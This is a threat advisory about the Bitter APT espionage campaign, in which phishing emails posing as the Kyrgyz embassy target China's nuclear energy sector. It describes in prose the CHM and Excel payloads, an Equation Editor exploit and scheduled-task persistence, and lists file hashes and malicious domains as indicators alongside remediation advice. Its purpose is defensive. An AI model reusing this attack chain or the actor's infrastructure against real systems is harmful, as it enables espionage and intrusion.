Rewterz Threat Alert – South Asian Espionage Group Bitter Targeting The Chinese Nuclear Energy Industry – Active IOCs

Severity

High

Analysis Summary

The Chinese nuclear energy industry has lately been under attack from a cyberespionage hacking group known as Bitter APT, which used phishing emails to infect computers with malware downloaders. Bitter APT group has been since at least 2021. In the past, the group has targeted organizations in Pakistan, China, Bangladesh, and Saudi Arabia. The group focuses on the energy and government sectors.

Experts have seen additional levels of obfuscation being used in recent attacks, as well as modifications to the first-stage payloads, in order to evade detection. Further decoys were used by threat actors for social engineering.

In a recent effort discovered by researchers, Bitter sends emails to numerous Chinese nuclear energy enterprises and academics involved in that subject while posing as the embassy of Kyrgyzstan in Beijing.

• phishing email

“We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China. In some emails, people and entities in academia are also targeted, also related to nuclear energy. The phishing emails contain a lure that invites the recipients to join conferences on subjects that are relevant to them. The lures are designed to socially engineer the recipient to download and open an attached RAR file that contains either a Microsoft Compiled HTML Help (CHM) or Excel payload.” mentioned in the report

The email contains a RAR attachment, which is falsely claimed to contain an invitation card for a conference, but actually contains either a Microsoft Compiled HTML Help (CHM) file or a malicious Excel document.

The Bitter APT uses a CHM payload that executes commands to create scheduled tasks on the compromised system and download the next stage of the attack. This is a common tactic used by attackers to maintain persistence on a system and evade detection by security software.

When an Excel document is hidden in the downloaded RAR attachments, the scheduled task is added by exploiting an older Equation Editor vulnerability that is triggered by the opening of the malicious document. Equation Editor is a component of Microsoft Office that allows users to insert mathematical equations into their documents. The vulnerability in Equation Editor was first discovered in 2017 and allowed attackers to execute code remotely on a victim’s computer.

According to a researcher, the threat actor probably prefers CHM payloads since they work with the least amount of user involvement, don’t require the victim to run a susceptible version of Microsoft Office, and may avoid static analysis thanks to LZX compression.

• Infection chain

They also added,“The Excel payloads simply contain an Equation Editor exploit that creates two different scheduled tasks. There is no decoy in the document. “One scheduled task (shown below) runs every 15 minutes, to download a next stage EXE payload using cURL, also sending the actor the name of the infected machine. These tactics have been observed being used by Bitter APT in 2021/2022.”

The second-stage payload is an MSI or PowerShell file if a CHM payload is used, or an EXE file if an Excel document payload is utilized.

• malicious Powershell (in CHM file)

Analysts were unable to collect any actual payloads delivered in this campaign, although they suspected that they might have included keyloggers, RATs (remote access tools), and data stealers.

“Bitter APT have been conducting espionage campaigns for years using many tactics, including phishing, to achieve their goals. It is advised that entities in government, energy, and engineering especially those in the Asia-Pacific region should remain vigilant when receiving emails, especially those claiming to be from other diplomatic entities.” researchers conclude.

Impact

• Information Theft and Espionage

Indicators of Compromise

MD5

• 096869b5c242495fb890924ef2837961
• 056f1c0037ca59e861c588ad531c1cc1
• d550af3393c4bc182368054b74927103
• 68efc0e20d04a98329e5a216d8616f74
• d0c328b2fffd372038fac489426b0ada
• a37bf0079ec5d34cadaf5ea78ecea7e4
• 7879b25156794db8d3ae8ad8be8a5729

SHA-256

• 5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1
• eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e
• cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179
• 8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74
• 33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799
• 5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc
• ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1

SHA-1

• 14480ee41babf14dec59173de7924cd9048d1a36
• 37d0ae71fa3946a75304e34086af917d99247f8b
• 28232975c39a13e530e3518347b7f8fd8326fdf4
• 5e4c28f859358ab91ca8de21b4ee303dc01f90d1
• d7c6aaf5f4d73147746225fa303ed237a06b562f
• 83f67a0e9f0526fdef7297ed12f7713d534b39a9
• 8fb0bbe84414429b9861b419bab0552b7342a21f

Domain Name

• qwavemediaservice.net
• mirzadihatti.com
• coauthcn.com

Remediation

• Search for IOCs in your environment. Block all threat indicators at your respective controls
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.Educate Employees: Organizations should provide security awareness training to their employees to ensure they understand the risks associated with phishing attacks and how to identify them. Employees should be cautious when receiving unexpected emails with attachments, especially if they are from an unknown sender.
• Update Software: Ensure that all software, including Microsoft Office, is up to date with the latest security patches to prevent vulnerabilities from being exploited by attackers.
• Implement Email Filtering: Deploy an email filtering system that can detect and block suspicious emails that may contain malware or phishing attempts.
• Limit Administrative Access: Restrict administrative access to critical systems and sensitive data to only those who require it.
• Implement Two-Factor Authentication (2FA): Implement 2FA as an additional layer of security to prevent unauthorized access to user accounts.
• Conduct Regular Backups: Regularly backup critical data and test the backup and recovery process to ensure that the organization can quickly restore operations in the event of a successful attack.
• Deploy Endpoint Detection and Response (EDR): Implement EDR solutions to detect and respond to any suspicious activity or malware on endpoints.
• Develop an Incident Response Plan: Organizations should have an incident response plan in place that outlines the steps to take in the event of a successful attack, including containment, eradication, and recovery.
• By following these steps, organizations can improve their overall security posture and mitigate the risk of falling victim to phishing attacks such as the one carried out by the Bitter threat actor group.